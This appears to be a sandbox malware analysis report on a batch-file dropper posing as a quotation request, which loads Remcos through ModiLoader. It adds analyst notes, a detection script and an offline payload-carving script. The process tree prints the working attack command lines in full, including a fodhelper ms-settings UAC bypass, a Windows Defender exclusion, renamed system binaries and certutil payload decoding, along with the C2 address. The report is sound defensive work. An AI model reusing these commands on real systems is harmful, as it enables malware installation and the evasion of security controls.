Analysis
max time kernel: 150s
max time network: 153s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-04-2024 07:15
Static task: static1
Behavioral task: behavioral1
  Sample: PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
  Resource: win7-20231129-en
Behavioral task: behavioral2
  Sample: PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
  Resource: win10v2004-20240226-en
General
Target: PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Size: 4.4MB
MD5: a9f2c8cc828e683395e9a804c120021e
SHA1: 6b1f7e910df1792b94690045d3de345cff297ff3
SHA256: c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
SHA512: c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
SSDEEP: 49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0
Malware Config
Extracted: remcos
RemoteHost: 192.3.216.139:44800
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-EP05ZF
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Note: install_flag, keylog_flag and screenshot_flag are all false in this configuration, so do not expect a Remcos\remcos.exe copy, a logs.dat keylog or screenshot files on disk from this build; the C2 endpoint (192.3.216.139:44800) and the mutex (Rmc-EP05ZF) are the indicators worth hunting on.
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families. In this run no download is involved: the second stage is carved out of the batch file itself with certutil (see the process tree).
-
ModiLoader Second Stage (1 IoC)
Processes:
  resource: behavioral2/memory/1700-58-0x0000000003F90000-0x0000000004F90000-memory.dmp  yara_rule: modiloader_stage2
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes:
  Key value queried: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation  (process: xkn.exe)
Note: xkn.exe is the extrac32 copy of powershell.exe, so this read is at least as consistent with normal PowerShell/.NET host start-up as with deliberate geofencing; treat it as low confidence on its own.
-
Executes dropped EXE (16 IoCs)
Processes (pid process): 3928 alpha.exe, 4232 alpha.exe, 2980 alpha.exe, 5052 xkn.exe, 3668 alpha.exe, 2664 alpha.exe, 4280 kn.exe, 1736 alpha.exe, 4352 kn.exe, 1700 Lewxa.com, 4112 alpha.exe, 4428 alpha.exe, 872 alpha.exe, 4116 alpha.exe, 3648 alpha.exe, 3292 alpha.exe
Note: alpha.exe, xkn.exe and kn.exe are extrac32 copies of cmd.exe, powershell.exe and certutil.exe (signed Microsoft binaries under new names in C:\Users\Public), so most of these hits are renamed LOLBins. Lewxa.com (pid 1700) is the only new executable and is the process the modiloader_stage2 YARA rule fired on.
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill (2 IoCs)
Processes (pid process): 1460 taskkill.exe, 4568 taskkill.exe
-
Modifies registry class (5 IoCs)
Processes: reg.exe
  Key created: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell
  Key created: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open
  Set value (str): \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "
  Key created: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings\shell\open\command
  Key created: \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\ms-settings
Note: HKCU\Software\Classes\ms-settings\shell\open\command is the key that fodhelper.exe, an auto-elevating Microsoft binary, resolves when it starts, so the default value runs at high integrity without a UAC prompt. Here the hijacked command adds a Windows Defender exclusion for C:\Users, the directory under which every later stage (Lewxa.txt, Lewxa.com, the renamed helpers) lives. The later taskkill of SystemSettings.exe and SystemSettingsAdminFlows.exe closes the Settings app that fodhelper opens. Remediation should remove the ms-settings key from the user hive and the C:\Users exclusion from Defender.
-
Modifies registry key (1 TTP, 1 IoC)
-
Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
Processes:
  HTTP User-Agent header (flow 26): Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes (pid process): 5052 xkn.exe (3 events)
-
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes: Token SeDebugPrivilege 5052 xkn.exe; Token SeDebugPrivilege 1460 taskkill.exe; Token SeDebugPrivilege 4568 taskkill.exe
-
Suspicious use of FindShellTrayWindow (1 IoC)
Processes (pid process): 1700 Lewxa.com
-
Suspicious use of SendNotifyMessage (1 IoC)
Processes (pid process): 1700 Lewxa.com
-
Suspicious use of WriteProcessMemory (49 IoCs)
Processes (parent pid/process wrote to memory of child pid/process; each pair is recorded twice unless noted):
  2152 cmd.exe -> 3732 cmd.exe
  3732 cmd.exe -> 4552 extrac32.exe
  2152 cmd.exe -> 3928 alpha.exe
  3928 alpha.exe -> 2960 extrac32.exe
  2152 cmd.exe -> 4232 alpha.exe
  4232 alpha.exe -> 4872 extrac32.exe
  2152 cmd.exe -> 2980 alpha.exe
  2980 alpha.exe -> 5052 xkn.exe
  5052 xkn.exe -> 3668 alpha.exe
  3668 alpha.exe -> 540 reg.exe
  5052 xkn.exe -> 2700 fodhelper.exe
  2152 cmd.exe -> 2664 alpha.exe
  2664 alpha.exe -> 4280 kn.exe
  2152 cmd.exe -> 1736 alpha.exe
  1736 alpha.exe -> 4352 kn.exe
  2152 cmd.exe -> 1700 Lewxa.com (3 events)
  2152 cmd.exe -> 4112 alpha.exe
  2152 cmd.exe -> 4428 alpha.exe
  2152 cmd.exe -> 872 alpha.exe
  2152 cmd.exe -> 4116 alpha.exe
  2152 cmd.exe -> 3648 alpha.exe
  3648 alpha.exe -> 1460 taskkill.exe
  2152 cmd.exe -> 3292 alpha.exe
  3292 alpha.exe -> 4568 taskkill.exe
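The signatures above fire on renamed copies of cmd.exe, powershell.exe and certutil.exe, on the ms-settings hijack and on fodhelper.exe. The following is an added example, not code from the sandbox report or from the malware, of a process-creation triage pass that flags those patterns from telemetry rather than from file names. The ProcEvent schema and the sample events are constructed from the command lines in this report (the field names are an assumption, not any vendor's format); the OriginalFileName strings are the usual PE version-resource values that Sysmon Event ID 1 reports, which survive a rename on disk.

```python
"""Added example: flag the LOLBin patterns of this chain from process-creation
events.  ProcEvent and SAMPLE_EVENTS are constructed for illustration."""
import re
from dataclasses import dataclass

# Binaries the chain copies out of System32 under new names; matched on the
# PE OriginalFileName (lower-cased) so the on-disk name does not matter.
RENAME_WATCHLIST = {"cmd.exe", "powershell.exe", "certutil.exe"}

# Key that fodhelper.exe (auto-elevating) resolves at start; hijacking its
# default value runs a command at high integrity without a UAC prompt.
MS_SETTINGS_KEY = r"software\classes\ms-settings\shell\open\command"

EXTRAC32_RE = re.compile(r"extrac32(?:\.exe)?\s+/c\s+/y\s+(\S+)\s+(\S+)")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\")


@dataclass
class ProcEvent:
    pid: int
    image: str               # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


def norm(s: str) -> str:
    """Collapse the doubled backslashes this batch file uses and lower-case."""
    return re.sub(r"\\+", r"\\", s).lower()


def analyze(ev: ProcEvent) -> list:
    """Return the rule hits for one process-creation event."""
    image, cmd, parent = norm(ev.image), norm(ev.command_line), norm(ev.parent_image)
    basename = image.rsplit("\\", 1)[-1]
    ofn = ev.original_file_name.lower()
    hits = []
    # 1. A System32 binary running under a different file name (alpha/xkn/kn).
    if ofn in RENAME_WATCHLIST and basename != ofn:
        hits.append(f"renamed-system-binary: {ofn} as {basename}")
    # 2. extrac32.exe used as a copy tool from C:\Windows to a user-writable path.
    m = EXTRAC32_RE.search(cmd)
    if m:
        src, dst = m.groups()
        if src.startswith("c:\\windows\\") and dst.startswith(USER_WRITABLE):
            hits.append(f"extrac32-copy: {src} -> {dst}")
    # 3. The ms-settings hijack (reg.exe itself and the parents whose command
    #    lines embed the same reg add).
    if MS_SETTINGS_KEY in cmd:
        hits.append("ms-settings-hijack")
    # 4. fodhelper.exe started by something outside C:\Windows.
    if basename == "fodhelper.exe" and not parent.startswith("c:\\windows\\"):
        hits.append(f"fodhelper-from-user-path: parent {parent}")
    # 5. A Defender exclusion being added from a command line.
    if "add-mppreference" in cmd and "-exclusionpath" in cmd:
        hits.append("defender-exclusion-added")
    # 6. certutil decoding, matched on the argument so renaming does not help.
    if "-decodehex" in cmd:
        hits.append("certutil-decodehex")
    return hits


def scan(events):
    """Map pid -> hits for every event that triggered at least one rule."""
    out = {}
    for ev in events:
        hits = analyze(ev)
        if hits:
            out[ev.pid] = hits
    return out


# Constructed sample events; pids, images and command lines follow the report.
SAMPLE_EVENTS = [
    ProcEvent(3732, r"C:\Windows\system32\cmd.exe", "Cmd.Exe",
              r"cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe",
              r"C:\Windows\system32\cmd.exe"),
    ProcEvent(5052, r"C:\Users\Public\xkn.exe", "PowerShell.EXE",
              r"""C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users' ; start fodhelper.exe" """,
              r"C:\Users\Public\alpha.exe"),
    ProcEvent(540, r"C:\Windows\system32\reg.exe", "reg.exe",
              r'reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "',
              r"C:\Users\Public\alpha.exe"),
    ProcEvent(2700, r"C:\Windows\system32\fodhelper.exe", "FodHelper.EXE",
              r'"C:\Windows\system32\fodhelper.exe"', r"C:\Users\Public\xkn.exe"),
    ProcEvent(4280, r"C:\Users\Public\kn.exe", "CertUtil.exe",
              r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9',
              r"C:\Users\Public\alpha.exe"),
    ProcEvent(1234, r"C:\Windows\System32\cmd.exe", "Cmd.Exe", "cmd /c dir",
              r"C:\Windows\explorer.exe"),  # benign control, should not fire
]

if __name__ == "__main__":
    for pid, hits in scan(SAMPLE_EVENTS).items():
        print(pid, hits)
```

Rule 1 is the one that matters most for this family: image-name rules miss alpha.exe, xkn.exe and kn.exe entirely, while OriginalFileName (or a hash match against the System32 originals) catches all three.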
Processes
Summary of the chain, as read from the tree below: the batch file uses extrac32.exe to copy cmd.exe, powershell.exe and certutil.exe into C:\Users\Public as alpha.exe, xkn.exe and kn.exe. The renamed PowerShell (xkn) writes the HKCU\Software\Classes\ms-settings\shell\open\command hijack and starts fodhelper.exe, so that Add-MpPreference -ExclusionPath C:\Users runs elevated without a UAC prompt. The renamed certutil (kn) then decodes a blob embedded in the batch file itself: the trailing 9 and 12 on the -decodehex lines are CRYPT_STRING_* decode types (9 = base64 between X509 CRL headers, 12 = raw hex), which turns the 4.4MB .bat into the 3.1MB Lewxa.txt and then the 1.5MB C:\Users\Public\Libraries\Lewxa.com. Lewxa.com (pid 1700) is executed and is the process the modiloader_stage2 YARA rule hit on. Finally the helper copies and the intermediate file are deleted and the Settings windows opened by fodhelper are killed.
-
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\extrac32.exe
      extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Users\Public\xkn.exe
      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Users\Public\alpha.exe
        "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
        - Executes dropped EXE
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\reg.exe
          reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
          - Modifies registry class
          - Modifies registry key
      - C:\Windows\system32\fodhelper.exe
        "C:\Windows\system32\fodhelper.exe"
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
      - Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
      - Executes dropped EXE
  - C:\Users\Public\Libraries\Lewxa.com
    C:\\Users\\Public\\Libraries\\Lewxa.com
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
    - Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
    - Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
    - Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
    - Executes dropped EXE
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SystemSettings.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SystemSettingsAdminFlows.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (separate process root, not part of the sample's tree)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3864 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
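The two certutil runs in the tree (type 9, then type 12) can be reproduced offline to carve the second stage from the batch file without executing anything. The following is an added example, not code from the report or from the malware. It relies on the fact that certutil -decodehex accepts an optional trailing type number that is passed to CryptStringToBinary as a CRYPT_STRING_* value (9 = CRYPT_STRING_BASE64X509CRLHEADER, 12 = CRYPT_STRING_HEXRAW); the sizes in this report (4.4MB .bat, 3.1MB Lewxa.txt, 1.5MB Lewxa.com) match the 4/3 base64 and 2/1 hex expansion that implies. The report does not show the body of the .bat, so the exact header line is an assumption (change BEGIN/END if a given sample wraps its blob differently), and the sample batch file built here is constructed around a tiny MZ stub, not a real PE.

```python
"""Added example: offline reproduction of the two certutil -decodehex stages.
The CRL header text and the sample batch file are constructed assumptions."""
import base64
import re

CRYPT_STRING_BASE64X509CRLHEADER = 9   # base64 between -----BEGIN X509 CRL----- / -----END X509 CRL-----
CRYPT_STRING_HEXRAW = 12               # bare hex digits, no offsets and no ASCII column

BEGIN = b"-----BEGIN X509 CRL-----"    # assumed header; adjust for a given sample
END = b"-----END X509 CRL-----"
BLOCK_RE = re.compile(re.escape(BEGIN) + rb"(.*?)" + re.escape(END), re.S)


def decode_type9(data: bytes) -> bytes:
    """Stage 1 (type 9): take the base64 body between the CRL headers, ignoring
    everything else in the file (the batch commands), and decode it."""
    m = BLOCK_RE.search(data)
    if not m:
        raise ValueError("no X509 CRL block found")
    body = re.sub(rb"\s+", b"", m.group(1))
    return base64.b64decode(body, validate=True)


def decode_type12(data: bytes) -> bytes:
    """Stage 2 (type 12): strip whitespace and hex-decode."""
    digits = re.sub(rb"\s+", b"", data)
    return bytes.fromhex(digits.decode("ascii"))


def carve_payload(bat: bytes) -> bytes:
    """Lewxa.txt is what decode_type9 yields; Lewxa.com is decode_type12 of that."""
    return decode_type12(decode_type9(bat))


def looks_like_pe(blob: bytes) -> bool:
    """Cheap sanity check on the carved result: a PE starts with the MZ signature."""
    return blob[:2] == b"MZ"


def build_sample_bat(payload: bytes) -> bytes:
    """Constructed stand-in for the real batch file: decoy commands followed by
    the payload encoded hex-then-base64 and wrapped in the CRL headers."""
    hex_stage = payload.hex().upper().encode("ascii")   # shape of Lewxa.txt
    b64_stage = base64.encodebytes(hex_stage)            # 76-column base64 lines
    return (b"@echo off\r\nrem decoy batch commands go here\r\n"
            + BEGIN + b"\r\n" + b64_stage + END + b"\r\n")


def stage_sizes(bat: bytes) -> tuple:
    """(batch, stage-1, stage-2) sizes; expect roughly 4/3 and 2/1 ratios."""
    stage1 = decode_type9(bat)
    return len(bat), len(stage1), len(decode_type12(stage1))


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_bat(b"MZ" + bytes(512))
    out = carve_payload(data)
    print(len(out), "bytes carved; MZ header:", looks_like_pe(out), "; sizes:", stage_sizes(data))
```

Run it against a real sample with the .bat path as the only argument; the carved bytes can then be hashed and compared with the Lewxa.com SHA256 listed under Downloads to confirm the extraction matches what the sandbox observed.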
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jbmrryv2.st4.ps1 (60B)
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  Note: __PSScriptPolicyTest_*.ps1 is written by the PowerShell host itself at start-up to test script-enforcement policy; it is a side effect of running xkn.exe (the renamed powershell.exe), not attacker content.
-
C:\Users\Public\Lewxa.txt (3.1MB; stage-1 output of kn -decodehex ... 9)
  MD5: aecbd8ff910c38b1772994a46cf4dcee
  SHA1: 96e1b7e276e7b19150c259a344e45b9fa04fac43
  SHA256: f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33
  SHA512: 2919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18
-
C:\Users\Public\Libraries\Lewxa.com (1.5MB; stage-2 output of kn -decodehex ... 12, executed as pid 1700)
  MD5: 6babecb95e226aef5eef6f80111e04de
  SHA1: f2974245b3391f9be136fdf76df36cc5ad0bed2d
  SHA256: a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0
  SHA512: 109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949
-
C:\Users\Public\alpha.exe (283KB; extrac32 copy of cmd.exe)
  MD5: 8a2122e8162dbef04694b9c3e0b6cdee
  SHA1: f1efb0fddc156e4c61c5f78a54700e4e7984d55d
  SHA256: b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
  SHA512: 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Users\Public\kn.exe (1.6MB; extrac32 copy of certutil.exe)
  MD5: bd8d9943a9b1def98eb83e0fa48796c2
  SHA1: 70e89852f023ab7cde0173eda1208dbb580f1e4f
  SHA256: 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
  SHA512: 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
C:\Users\Public\xkn.exe (442KB; extrac32 copy of powershell.exe)
  MD5: 04029e121a0cfa5991749937dd22a1d9
  SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
  SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
  SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
Note: the hashes of alpha.exe, kn.exe and xkn.exe are those of the sandbox image's own cmd.exe, certutil.exe and powershell.exe and will differ on any other Windows build; do not use them as indicators. Lewxa.com and Lewxa.txt are the sample-specific artifacts.
-
Memory dumps (pid 1700 = Lewxa.com; pid 5052 = xkn.exe). memory/1700-58 at 0x0000000003F90000-0x0000000004F90000 is the region the modiloader_stage2 YARA rule matched; 1700-60 at 0x0000000000400000-0x0000000000596000 (1.6MB) is the mapped Lewxa.com image.
  memory/1700-73-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-65-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-89-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-88-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-84-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-83-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-56-0x0000000000A30000-0x0000000000A31000-memory.dmp: 4KB
  memory/1700-57-0x0000000003F90000-0x0000000004F90000-memory.dmp: 16.0MB
  memory/1700-58-0x0000000003F90000-0x0000000004F90000-memory.dmp: 16.0MB
  memory/1700-60-0x0000000000400000-0x0000000000596000-memory.dmp: 1.6MB
  memory/1700-61-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-62-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-63-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-79-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-66-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-67-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-69-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-71-0x0000000000A30000-0x0000000000A31000-memory.dmp: 4KB
  memory/1700-78-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/1700-74-0x0000000016320000-0x0000000017320000-memory.dmp: 16.0MB
  memory/5052-22-0x000001E0A03A0000-0x000001E0A03C2000-memory.dmp: 136KB
  memory/5052-32-0x000001E086070000-0x000001E086080000-memory.dmp: 64KB
  memory/5052-27-0x00007FFE93670000-0x00007FFE94131000-memory.dmp: 10.8MB
  memory/5052-28-0x000001E086070000-0x000001E086080000-memory.dmp: 64KB
  memory/5052-29-0x000001E086070000-0x000001E086080000-memory.dmp: 64KB
  memory/5052-35-0x00007FFE93670000-0x00007FFE94131000-memory.dmp: 10.8MB